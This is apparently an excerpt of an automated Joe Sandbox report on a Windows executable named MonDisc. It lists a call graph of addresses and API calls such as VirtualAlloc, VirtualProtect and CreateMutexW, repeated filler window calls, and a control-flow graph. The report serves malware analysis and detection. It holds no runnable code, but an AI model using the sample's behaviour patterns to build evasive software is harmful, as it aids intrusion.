57913 7ff62c911714 57910->57913 57911->57869 57912 7ff62c9117c5 57914 7ff62c9119e9 57912->57914 57915 7ff62c9117f1 57912->57915 57913->57912 57913->57914 57947 7ff62c909c30 18 API calls 57913->57947 57951 7ff62c910280 35 API calls _fread_nolock 57914->57951 57917 7ff62c9119df 57915->57917 57948 7ff62c954220 18 API calls 57915->57948 57950 7ff62c9418b0 18 API calls _fread_nolock 57917->57950 57919 7ff62c9119e7 57919->57869 57922 7ff62c91189b 57922->57917 57923 7ff62c90a4b0 18 API calls 57922->57923 57924 7ff62c9118c8 57923->57924 57949 7ff62c954120 16 API calls _vwscanf_s_l 57924->57949 57926->57867 57935 7ff62c915190 57927->57935 57929 7ff62c909d61 57929->57905 57933->57906 57936 7ff62c9151aa 57935->57936 57938 7ff62c909d57 57936->57938 57940 7ff62c914230 57936->57940 57938->57929 57939 7ff62c9015c0 18 API calls 57938->57939 57941 7ff62c91426b 57940->57941 57942 7ff62c9142fd 57940->57942 57941->57942 57944 7ff62c91427e GetLastError VirtualAlloc SetLastError 57941->57944 57943 7ff62c914314 GetLastError VirtualAlloc SetLastError 57942->57943 57946 7ff62c91434f 57942->57946 57943->57946 57944->57942 57945 7ff62c9142b6 57944->57945 57945->57942 57945->57946 57946->57938 57947->57912 57948->57922 57949->57917 57950->57919 57951->57919 57952->57877 57968 7ff62c900c60 57953->57968 57955 7ff62c9019ad 57956 7ff62c9019de 57955->57956 57980 7ff62c9017a0 57955->57980 57958 7ff62c901990 17 API calls 57956->57958 57960 7ff62c9019e4 57958->57960 57959 7ff62c901a37 57959->57884 57960->57959 57962 7ff62c901b01 57960->57962 57983 7ff62c901970 18 API calls _fread_nolock 57960->57983 57962->57959 57963 7ff62c901b6b RtlUnwindEx 57962->57963 57963->57959 57964->57891 57966 7ff62c901990 18 API calls 57965->57966 57967 7ff62c90fed0 57966->57967 57969 7ff62c900c91 _fread_nolock 57968->57969 57970 7ff62c900da0 RaiseException _purecall 57968->57970 57971 7ff62c900cab RtlCaptureContext RtlLookupFunctionEntry 57969->57971 57972 7ff62c900cd9 57971->57972 57976 7ff62c900d3e 57971->57976 57973 7ff62c900ce0 RtlVirtualUnwind 57972->57973 57974 7ff62c900d1e RtlLookupFunctionEntry 57973->57974 57975 7ff62c900d76 57973->57975 57974->57973 57974->57976 57978 7ff62c973de0 _handle_error 4 API calls 57975->57978 57976->57975 57977 7ff62c900d58 RtlRestoreContext 57976->57977 57977->57975 57979 7ff62c900d96 57978->57979 57979->57955 57982 7ff62c901880 57980->57982 57981 7ff62c901990 18 API calls 57981->57982 57982->57981 57983->57962 57986 7ff62c95279d 57984->57986 57985 7ff62c9527cc 58025 7ff62c90fde0 57985->58025 57986->57985 58037 7ff62c958dc0 18 API calls 57986->58037 57989 7ff62c952807 58028 7ff62c93b610 57989->58028 57991 7ff62c952e89 57992 7ff62c90fe90 18 API calls 57991->57992 57993 7ff62c952e98 57992->57993 57994 7ff62c90fe90 18 API calls 57993->57994 57996 7ff62c952ea7 57994->57996 57995 7ff62c952e7f 58047 7ff62c94d2d0 23 API calls 57995->58047 57996->57819 58003 7ff62c94f820 23 API calls 58007 7ff62c952854 58003->58007 58006 7ff62c952ce1 _fread_nolock 58046 7ff62c94f930 23 API calls _handle_error 58006->58046 58007->57991 58007->57995 58007->58003 58007->58006 58010 7ff62c90fde0 18 API calls 58007->58010 58038 7ff62c94e460 18 API calls 58007->58038 58039 7ff62c9503f0 23 API calls 58007->58039 58040 7ff62c94f930 23 API calls _handle_error 58007->58040 58041 7ff62c94b5e0 18 API calls 58007->58041 58042 7ff62c949610 23 API calls 58007->58042 58043 7ff62c953750 23 API calls 58007->58043 58044 7ff62c949f10 23 API calls _handle_error 58007->58044 58045 7ff62c958bc0 18 API calls 58007->58045 58010->58007 58011 7ff62c952d24 58011->57993 58012 7ff62c952d2e 58011->58012 58013 7ff62c973de0 _handle_error 4 API calls 58012->58013 58014 7ff62c952e6e 58013->58014 58014->57819 58016 7ff62c911db2 58015->58016 58057 7ff62c93b370 58016->58057 58018 7ff62c911ec0 _fread_nolock 58019 7ff62c912056 58018->58019 58063 7ff62c954220 18 API calls 58018->58063 58019->57820 58021 7ff62c911fd7 58021->58019 58022 7ff62c90a4b0 18 API calls 58021->58022 58023 7ff62c912000 58022->58023 58064 7ff62c954120 16 API calls _vwscanf_s_l 58023->58064 58026 7ff62c909d30 18 API calls 58025->58026 58027 7ff62c90fe25 _fread_nolock 58026->58027 58027->57989 58029 7ff62c93b636 58028->58029 58030 7ff62c93b62c 58028->58030 58032 7ff62c93b63f VirtualProtect 58029->58032 58033 7ff62c93b634 58029->58033 58048 7ff62c93b7f0 58030->58048 58032->58033 58034 7ff62c93b681 58032->58034 58033->58007 58056 7ff62c93b9d0 19 API calls 58034->58056 58036 7ff62c93b689 58037->57985 58038->58007 58039->58007 58040->58007 58041->58007 58042->58007 58043->58007 58044->58007 58045->58007 58046->58011 58051 7ff62c93b846 58048->58051 58049 7ff62c93b84b VirtualAlloc 58049->58051 58050 7ff62c93b8d6 58050->58033 58051->58049 58051->58050 58052 7ff62c93b889 VirtualFree 58051->58052 58053 7ff62c93b934 58051->58053 58052->58051 58054 7ff62c90fe90 18 API calls 58053->58054 58055 7ff62c93b941 VirtualFree 58054->58055 58056->58036 58058 7ff62c93b389 VirtualProtect 58057->58058 58060 7ff62c93b3ac 58057->58060 58059 7ff62c93b3bc 58058->58059 58058->58060 58065 7ff62c93b9d0 19 API calls 58059->58065 58060->58018 58062 7ff62c93b3c4 58063->58021 58064->58019 58065->58062 58067 7ff62c8fb2de 58066->58067 58068 7ff62c90909e 58066->58068 58070 7ff62c909140 58067->58070 58068->58067 58075 7ff62c9079b0 58068->58075 58071 7ff62c8fb2e6 58070->58071 58073 7ff62c909159 58070->58073 58071->57800 58073->58071 58074 7ff62c9079b0 18 API calls 58073->58074 58080 7ff62c90bce0 18 API calls 58073->58080 58074->58073 58077 7ff62c9079f9 58075->58077 58076 7ff62c907a72 58076->58068 58077->58076 58078 7ff62c901990 18 API calls 58077->58078 58079 7ff62c907a95 58078->58079 58079->58068 58080->58073 58087 7ff62c913c97 58081->58087 58082 7ff62c913da4 58082->57833 58084 7ff62c913df4 58085 7ff62c901990 18 API calls 58084->58085 58086 7ff62c913e11 58085->58086 58087->58082 58089 7ff62c913d96 58087->58089 58106 7ff62c913ac0 18 API calls 58087->58106 58089->58082 58107 7ff62c901970 18 API calls _fread_nolock 58089->58107 58108 7ff62c91c380 58090->58108 58093 7ff62c91ccc4 58094 7ff62c91cc4b 58095 7ff62c91cc7a 58094->58095 58126 7ff62c91c160 18 API calls _fread_nolock 58094->58126 58095->57840 58097 7ff62c91cb84 58097->58094 58098 7ff62c91ccb6 58097->58098 58099 7ff62c91c1c0 18 API calls 58097->58099 58119 7ff62c91ccd0 58097->58119 58125 7ff62c8fb4d0 18 API calls 58097->58125 58127 7ff62c91c160 18 API calls _fread_nolock 58098->58127 58099->58097 58102->57840 58103->57844 58104->57843 58105->57848 58107->58084 58109 7ff62c91c398 58108->58109 58112 7ff62c91c3a4 58108->58112 58128 7ff62c91c1c0 18 API calls _fread_nolock 58109->58128 58110 7ff62c91c4ca 58110->58097 58112->58110 58114 7ff62c91c43f 58112->58114 58129 7ff62c934580 18 API calls 58112->58129 58115 7ff62c91c455 58114->58115 58130 7ff62c91c1c0 18 API calls _fread_nolock 58114->58130 58117 7ff62c90a4b0 18 API calls 58115->58117 58118 7ff62c91c4ac 58117->58118 58118->58097 58120 7ff62c91cd44 58119->58120 58131 7ff62c909cc0 58120->58131 58123 7ff62c91cdc3 _fread_nolock 58137 7ff62c91c4e0 18 API calls 58123->58137 58124 7ff62c91cfdb _fread_nolock 58124->58097 58125->58097 58126->58098 58127->58093 58128->58112 58129->58114 58130->58115 58136 7ff62c915190 6 API calls 58131->58136 58132 7ff62c909ce7 58133 7ff62c909cef 58132->58133 58138 7ff62c9015c0 18 API calls 58132->58138 58133->58123 58136->58132 58137->58124 58140 7ff62c93f308 58139->58140 58141 7ff62c93f506 58140->58141 58142 7ff62c93f4fe 58140->58142 58203 7ff62c93bd80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind _handle_error 58140->58203 58145 7ff62c940a6f 58141->58145 58148 7ff62c93f564 58141->58148 58178 7ff62c93f518 58141->58178 58204 7ff62c93bb10 18 API calls 58142->58204 58147 7ff62c90fe90 18 API calls 58145->58147 58146 7ff62c93f5e8 58149 7ff62c93f64a 58146->58149 58206 7ff62c945970 18 API calls 58146->58206 58150 7ff62c940a7c 58147->58150 58148->58146 58186 7ff62c963c80 58148->58186 58154 7ff62c93f6aa 58149->58154 58207 7ff62c945970 18 API calls 58149->58207 58151 7ff62c90fe90 18 API calls 58150->58151 58153 7ff62c940a87 58151->58153 58157 7ff62c90fe90 18 API calls 58153->58157 58155 7ff62c93f6e8 58154->58155 58156 7ff62c93f79b 58154->58156 58163 7ff62c93f6f6 58155->58163 58164 7ff62c93f73c 58155->58164 58183 7ff62c93f732 58155->58183 58156->58183 58211 7ff62c945970 18 API calls 58156->58211 58160 7ff62c940a95 58157->58160 58167 7ff62c90fe90 18 API calls 58160->58167 58161 7ff62c93f5e0 58205 7ff62c93bb10 18 API calls 58161->58205 58163->58183 58208 7ff62c958f20 18 API calls 58163->58208 58165 7ff62c93f76d 58164->58165 58166 7ff62c93f75b 58164->58166 58210 7ff62c959140 18 API calls 58165->58210 58209 7ff62c958fd0 18 API calls 58166->58209 58171 7ff62c940aa3 58167->58171 58173 7ff62c90fe90 18 API calls 58171->58173 58174 7ff62c940ab1 58173->58174 58175 7ff62c90fe90 18 API calls 58174->58175 58177 7ff62c940abc 58175->58177 58176 7ff62c90fe90 18 API calls 58179 7ff62c940af7 58176->58179 58180 7ff62c90fe90 18 API calls 58177->58180 58178->57856 58181 7ff62c940aca 58180->58181 58200 7ff62c90fee0 58181->58200 58183->58176 58183->58178 58184->57858 58185->57852 58187 7ff62c963cad 58186->58187 58188 7ff62c963e93 58187->58188 58190 7ff62c963e91 58187->58190 58191 7ff62c963e7e 58187->58191 58213 7ff62c9604f0 18 API calls 58188->58213 58190->58161 58192 7ff62c963e9d 58191->58192 58193 7ff62c963e83 58191->58193 58192->58190 58195 7ff62c90fe90 18 API calls 58192->58195 58212 7ff62c958fd0 18 API calls 58193->58212 58197 7ff62c963edf 58195->58197 58196 7ff62c963eed 58196->58161 58197->58196 58214 7ff62c958fd0 18 API calls 58197->58214 58199 7ff62c963f22 58199->58161 58201 7ff62c901990 18 API calls 58200->58201 58202 7ff62c90ff15 58201->58202 58203->58142 58204->58141 58205->58146 58206->58149 58207->58154 58208->58183 58209->58183 58210->58183 58211->58183 58212->58190 58213->58190 58214->58199 58215->57773 58216->57773 58217->57778 58218->57778 58220 7ff62c8fe2c5 58219->58220 58221 7ff62c90a4b0 18 API calls 58220->58221 58222 7ff62c8fe2e5 58221->58222 58225 7ff62c90dcb0 18 API calls 58222->58225 58224 7ff62c8fe307 58224->57778 58225->58224 58226 2247ab73f7f 58228 2247ab73f88 58226->58228 58227 2247ab73fd4 58229 2247ab7400a CreateMutexW 58227->58229 58231 2247ab73f31 58227->58231 58228->58227 58228->58231 58232 2247ab74036 58228->58232 58229->58231 58233 2247ab73fd4 58232->58233 58233->58232 58234 2247ab7400a CreateMutexW 58233->58234 58235 2247ab7404d 58233->58235 58234->58235 58235->58227 58236 7ff62c8f19c7 58237 7ff62c8f1a03 58236->58237 58238 7ff62c8f19df 58236->58238 58242 7ff62c90ccf0 58237->58242 58238->58237 58247 7ff62c9b0070 16 API calls 58238->58247 58241 7ff62c8f3297 58244 7ff62c90cd40 58242->58244 58243 7ff62c90cd85 58243->58241 58244->58243 58248 7ff62c901660 58244->58248 58246 7ff62c90ce65 58247->58237 58249 7ff62c901688 58248->58249 58253 7ff62c900be0 58249->58253 58254 7ff62c900c16 58253->58254 58261 7ff62c919f60 58254->58261 58259 7ff62c9017a0 18 API calls 58260 7ff62c900c56 58259->58260 58266 7ff62c919f94 58261->58266 58262 7ff62c90a4b0 18 API calls 58263 7ff62c91a1be 58262->58263 58264 7ff62c900c38 58263->58264 58276 7ff62c8fb4d0 18 API calls 58263->58276 58267 7ff62c917230 58264->58267 58266->58262 58268 7ff62c9172b2 58267->58268 58271 7ff62c917256 58267->58271 58278 7ff62c919f30 18 API calls 58268->58278 58270 7ff62c9172b0 58272 7ff62c973de0 _handle_error 4 API calls 58270->58272 58271->58268 58273 7ff62c91727e 58271->58273 58274 7ff62c900c4e 58272->58274 58277 7ff62c919f30 18 API calls 58273->58277 58274->58259 58276->58264 58277->58270 58278->58270 58279 7ff62c911e28 58290 7ff62c9525b0 58279->58290 58281 7ff62c911e4c 58282 7ff62c93b370 20 API calls 58281->58282 58283 7ff62c911ec0 _fread_nolock 58282->58283 58284 7ff62c912056 58283->58284 58285 7ff62c954220 18 API calls 58283->58285 58286 7ff62c911fd7 58285->58286 58286->58284 58287 7ff62c90a4b0 18 API calls 58286->58287 58288 7ff62c912000 58287->58288 58289 7ff62c954120 16 API calls 58288->58289 58289->58284 58293 7ff62c93b4f0 58290->58293 58292 7ff62c9525e9 58294 7ff62c93b57e 58293->58294 58295 7ff62c93b505 58293->58295 58296 7ff62c93b5d3 58294->58296 58299 7ff62c93b59a 58294->58299 58297 7ff62c93b551 VirtualProtect 58295->58297 58298 7ff62c93b511 58295->58298 58296->58296 58305 7ff62c93b5e8 VirtualProtect 58296->58305 58301 7ff62c93b571 58297->58301 58302 7ff62c93b600 58297->58302 58300 7ff62c93b51a VirtualProtect 58298->58300 58298->58301 58303 7ff62c93b5c5 58299->58303 58304 7ff62c93b5a3 VirtualProtect 58299->58304 58300->58302 58307 7ff62c93b53a 58300->58307 58301->58292 58310 7ff62c93b9d0 19 API calls 58302->58310 58303->58292 58304->58302 58308 7ff62c93b5bb 58304->58308 58305->58302 58305->58303 58307->58292 58308->58303 58309 7ff62c93b608 58310->58309 58311 7ff62c8f4a01 58312 7ff62c8f4a0c 58311->58312 58314 7ff62c8f4a30 58311->58314 58312->58314 58315 7ff62c8ff9d0 58312->58315 58330 7ff62c984d84 58315->58330 58318 7ff62c8ffa42 58319 7ff62c8ffa78 58318->58319 58333 7ff62c910750 58318->58333 58321 7ff62c8ffaa7 58319->58321 58339 7ff62c8feea0 18 API calls _handle_error 58319->58339 58322 7ff62c8ffb0f 58321->58322 58340 7ff62c8feea0 18 API calls _handle_error 58321->58340 58323 7ff62c8ffb4a 58322->58323 58341 7ff62c8feea0 18 API calls _handle_error 58322->58341 58325 7ff62c984d84 _set_errno_from_matherr 11 API calls 58323->58325 58327 7ff62c8ffb4f SetLastError 58325->58327 58328 7ff62c9ee048 58327->58328 58342 7ff62c9c5560 GetLastError 58330->58342 58332 7ff62c8ff9ef GetLastError 58332->58318 58334 7ff62c910789 58333->58334 58335 7ff62c8f3037 43 API calls 58334->58335 58336 7ff62c9107ad 58335->58336 58337 7ff62c9107d7 58336->58337 58338 7ff62c8f3037 43 API calls 58336->58338 58337->58319 58338->58336 58339->58321 58340->58322 58341->58323 58343 7ff62c9c5587 58342->58343 58344 7ff62c9c5582 58342->58344 58348 7ff62c9c558f SetLastError 58343->58348 58365 7ff62c9c6f60 4 API calls 2 library calls 58343->58365 58373 7ff62c9c6f18 GetLastError FreeLibrary GetProcAddress TlsGetValue try_get_function 58344->58373 58347 7ff62c9c55aa 58347->58348 58366 7ff62c9c5ecc 58347->58366 58348->58332 58352 7ff62c9c55db 58376 7ff62c9c6f60 4 API calls 2 library calls 58352->58376 58353 7ff62c9c55cb 58374 7ff62c9c6f60 4 API calls 2 library calls 58353->58374 58356 7ff62c9c55d2 58375 7ff62c9c5f4c 11 API calls 2 library calls 58356->58375 58357 7ff62c9c55e3 58358 7ff62c9c55f9 58357->58358 58359 7ff62c9c55e7 58357->58359 58378 7ff62c9c4e98 11 API calls _set_errno_from_matherr 58358->58378 58377 7ff62c9c6f60 4 API calls 2 library calls 58359->58377 58363 7ff62c9c5601 58379 7ff62c9c5f4c 11 API calls 2 library calls 58363->58379 58365->58347 58371 7ff62c9c5edd _set_errno_from_matherr 58366->58371 58367 7ff62c9c5f2e 58370 7ff62c984d84 _set_errno_from_matherr 10 API calls 58367->58370 58368 7ff62c9c5f12 RtlAllocateHeap 58369 7ff62c9c55bd 58368->58369 58368->58371 58369->58352 58369->58353 58370->58369 58371->58367 58371->58368 58380 7ff62c9e25c0 RtlLeaveCriticalSection _invalid_parameter_noinfo _set_errno_from_matherr 58371->58380 58374->58356 58375->58348 58376->58357 58377->58356 58378->58363 58379->58348 58380->58371 58381 7ff62c8f1a21 58384 7ff62c90cf30 58381->58384 58383 7ff62c8f1a47 58392 7ff62c90cf63 58384->58392 58385 7ff62c90d2e7 58395 7ff62c901650 18 API calls 58385->58395 58387 7ff62c90a4b0 18 API calls 58387->58392 58388 7ff62c90d1af 58389 7ff62c90d151 58388->58389 58390 7ff62c901660 18 API calls 58388->58390 58389->58383 58393 7ff62c90d31d 58390->58393 58392->58385 58392->58387 58392->58388 58392->58389 58394 7ff62c936220 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 58392->58394 58394->58392 58396 7ff62c905020 58397 7ff62c8f3037 43 API calls 58396->58397 58398 7ff62c905094 58397->58398 58399 7ff62c8f63ba GetDesktopWindow 58400 7ff62c8f63cc 58399->58400 58401 7ff62c8f6476 GetDoubleClickTime 58400->58401 58402 7ff62c8f647e GetSystemDefaultLangID 58401->58402 58402->58402 58403 7ff62c8f6495 58402->58403 58427 7ff62c984af0 58403->58427 58406 7ff62c8f64b8 58407 7ff62c8f6509 GetDoubleClickTime 58406->58407 58409 7ff62c8f6514 58407->58409 58408 7ff62c8f65d4 GetDoubleClickTime GetDesktopWindow GetWindowTextLengthW 58410 7ff62c8f65f1 58408->58410 58409->58408 58409->58409 58410->58410 58411 7ff62c8f6602 GetDoubleClickTime 58410->58411 58412 7ff62c8f660a 58411->58412 58412->58412 58413 7ff62c8f6629 GetWindowTextLengthW 58412->58413 58414 7ff62c8f6636 58413->58414 58415 7ff62c8f66ac GetCommandLineW GetForegroundWindow GetTopWindow 58414->58415 58416 7ff62c8f66d0 58415->58416 58417 7ff62c984af0 13 API calls 58416->58417 58418 7ff62c8f66dc 58417->58418 58419 7ff62c8f66e6 GetLargePageMinimum GetForegroundWindow 58418->58419 58421 7ff62c8f66f9 58419->58421 58420 7ff62c8f67f0 GetTickCount 58422 7ff62c8f6884 58420->58422 58421->58420 58425 7ff62c8f672e 58421->58425 58423 7ff62c8f68a0 7 API calls 58422->58423 58426 7ff62c8f68e6 58423->58426 58424 7ff62c8f6749 GetForegroundWindow 58424->58425 58425->58420 58425->58421 58425->58424 58426->58426 58428 7ff62c984b18 58427->58428 58438 7ff62c984bcb _fread_nolock 58427->58438 58429 7ff62c984bdb 58428->58429 58432 7ff62c984b2f 58428->58432 58431 7ff62c9c5560 _set_errno_from_matherr 11 API calls 58429->58431 58429->58438 58430 7ff62c984d84 _set_errno_from_matherr 11 API calls 58439 7ff62c8f64ad GetDoubleClickTime 58430->58439 58433 7ff62c984bf7 58431->58433 58434 7ff62c984b51 SetConsoleCtrlHandler 58432->58434 58436 7ff62c984b70 58432->58436 58433->58438 58441 7ff62c9c5a90 12 API calls _set_errno_from_matherr 58433->58441 58434->58436 58440 7ff62c9c5b8c RtlLeaveCriticalSection 58436->58440 58438->58430 58438->58439 58439->58406 58441->58438 58442 7ff62c90b5f0 58445 7ff62c90bff0 58442->58445 58444 7ff62c90b608 _fread_nolock 58444->58444 58446 7ff62c90c056 58445->58446 58447 7ff62c90c014 58445->58447 58448 7ff62c909cc0 18 API calls 58446->58448 58449 7ff62c909cc0 18 API calls 58447->58449 58450 7ff62c90c060 58448->58450 58451 7ff62c90c021 58449->58451 58450->58451 58452 7ff62c90c10b 58450->58452 58454 7ff62c909d30 18 API calls 58450->58454 58451->58452 58453 7ff62c90c0e2 58451->58453 58455 7ff62c90c0bd 58451->58455 58459 7ff62c901650 18 API calls 58452->58459 58453->58444 58454->58451 58457 7ff62c909d30 18 API calls 58455->58457 58457->58453 58460 7ff62c8fa3fb 58463 7ff62c8fa391 58460->58463 58461 7ff62c8fa469 GetMessageExtraInfo 58467 7ff62c8fa474 58461->58467 58462 7ff62c8fa549 AnyPopup 58465 7ff62c8fa554 58462->58465 58463->58460 58463->58461 58464 7ff62c8fa3ad GetUserDefaultLangID 58463->58464 58464->58463 58464->58464 58466 7ff62c8fa5c2 GetLargePageMinimum GetModuleHandleW 58465->58466 58468 7ff62c8fa5de 58466->58468 58467->58462 58467->58466 58471 7ff62c8fb610 58468->58471 58480 7ff62c916850 58471->58480 58473 7ff62c8f3037 43 API calls 58474 7ff62c8fb637 58473->58474 58474->58473 58475 7ff62c8fb6bf 58474->58475 58485 7ff62c910570 58475->58485 58477 7ff62c8fa5fb 58478 7ff62c8fb6df 58478->58477 58479 7ff62c914ac0 GetLastError VirtualQuery VirtualFree SetLastError 58478->58479 58479->58477 58481 7ff62c9168bb 58480->58481 58482 7ff62c91686e WaitForSingleObject RtlDeleteCriticalSection 58480->58482 58481->58474 58483 7ff62c9168ab 58482->58483 58488 7ff62c910280 35 API calls _fread_nolock 58483->58488 58489 7ff62c93b3d0 58485->58489 58488->58481 58490 7ff62c91058c 58489->58490 58491 7ff62c93b3f3 58489->58491 58492 7ff62c93b400 VirtualFree 58491->58492 58492->58490 58492->58492 58493 7ff62c9c670c 58494 7ff62c9c676d 58493->58494 58500 7ff62c9c6768 try_get_function 58493->58500 58495 7ff62c9c6850 58495->58494 58496 7ff62c9c685e GetProcAddress 58495->58496 58497 7ff62c9c686f 58496->58497 58497->58494 58498 7ff62c9c67bd GetLastError 58498->58500 58499 7ff62c9c6835 FreeLibrary 58499->58500 58500->58494 58500->58495 58500->58498 58500->58499 58501 7ff62c8f4a97 58502 7ff62c8f4aa7 58501->58502 58505 7ff62c8ff020 58502->58505 58504 7ff62c8f4ac4 58506 7ff62c984d84 _set_errno_from_matherr 11 API calls 58505->58506 58507 7ff62c8ff04e GetLastError 58506->58507 58508 7ff62c8ff080 58507->58508 58509 7ff62c8ff0ca 58507->58509 58510 7ff62c8ff0be 58508->58510 58522 7ff62c8fb470 18 API calls 58508->58522 58509->58510 58523 7ff62c8fb470 18 API calls 58509->58523 58512 7ff62c8ff111 58510->58512 58513 7ff62c8ff0f6 58510->58513 58516 7ff62c910750 43 API calls 58512->58516 58518 7ff62c8ff131 58512->58518 58524 7ff62c910630 45 API calls _set_errno_from_matherr 58513->58524 58516->58518 58517 7ff62c8ff105 58520 7ff62c984d84 _set_errno_from_matherr 11 API calls 58517->58520 58518->58517 58518->58518 58525 7ff62c8feea0 18 API calls _handle_error 58518->58525 58521 7ff62c8ff1e5 SetLastError 58520->58521 58521->58504 58522->58510 58523->58510 58525->58517

                              Executed Functions

                              Function 00007FF62C8F517B Relevance: 73.0, APIs: 48, Instructions: 994timewindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 7ff62c8f517b-7ff62c8f5180 1 7ff62c8f5182-7ff62c8f51a8 0->1 3 7ff62c8f51aa-7ff62c8f51b9 1->3 3->3 4 7ff62c8f51bb-7ff62c8f51d6 3->4 6 7ff62c8f5171-7ff62c8f5179 call 7ff62c984484 4->6 7 7ff62c8f51d8-7ff62c8f521a call 7ff62c984484 GetMessageTime 4->7 6->1 14 7ff62c8f521c-7ff62c8f522b 7->14 14->14 15 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 14->15 20 7ff62c8f526a-7ff62c8f5279 15->20 20->20 21 7ff62c8f527b-7ff62c8f5285 20->21 22 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 21->22 29 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 22->29 32 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 29->32 32->32 33 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 32->33 38 7ff62c8f5364-7ff62c8f5373 33->38 38->38 39 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 38->39 45 7ff62c8f53af 39->45 46 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 45->46 51 7ff62c8f5401-7ff62c8f5418 46->51 51->45 52 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 51->52 53 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 52->53 57 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 53->57 58 7ff62c8f544c-7ff62c8f544f 53->58 63 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 57->63 58->53 58->57 63->63 64 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 63->64 86 7ff62c8f55d1-7ff62c8f55e0 64->86 86->86 87 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 86->87 91 7ff62c8f5603-7ff62c8f561a GetTopWindow 87->91 91->91 92 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 91->92 109 7ff62c8f75dd-7ff62c8f75eb 92->109 109->109 110 7ff62c8f75ed-7ff62c8f75fc 109->110 111 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 110->111 115 7ff62c8f75fe-7ff62c8f7602 111->115 116 7ff62c8f762e-7ff62c8f7630 111->116 115->111 115->116 117 7ff62c8f7635 116->117 118 7ff62c8f7637-7ff62c8f7645 117->118 118->118 119 7ff62c8f7647-7ff62c8f7655 118->119 119->117 120 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 119->120 128 7ff62c8f76a7-7ff62c8f76b5 120->128 128->128 129 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 128->129 130 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 129->130 134 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 130->134 135 7ff62c8f76c8-7ff62c8f76cc 130->135 148 7ff62c8f77f5-7ff62c8f7803 134->148 135->130 135->134 148->148 149 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 148->149 150 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 149->150 155 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 150->155 165 7ff62c8f7975-7ff62c8f7983 155->165 165->165 166 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 165->166 190 7ff62c8f7c3c-7ff62c8f7c48 166->190 191 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 190->191 192 7ff62c8f7ba9-7ff62c8f7bad 190->192 193 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 191->193 192->190 192->191 193->193 194 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 193->194 195 7ff62c8f7c9c-7ff62c8f7caa 194->195 195->195 196 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 195->196 202 7ff62c8f7cf9-7ff62c8f7d07 196->202 202->202 203 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 202->203 236 7ff62c8f7ecf-7ff62c8f7edd 203->236 236->236 237 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 236->237 245 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 237->245 246 7ff62c8f8029-7ff62c8f8031 237->246 245->246 254 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 245->254 251 7ff62c8f8033-7ff62c8f8041 246->251 251->251 253 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 251->253 253->245 253->254 281 7ff62c8f81b9 254->281 281->281
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
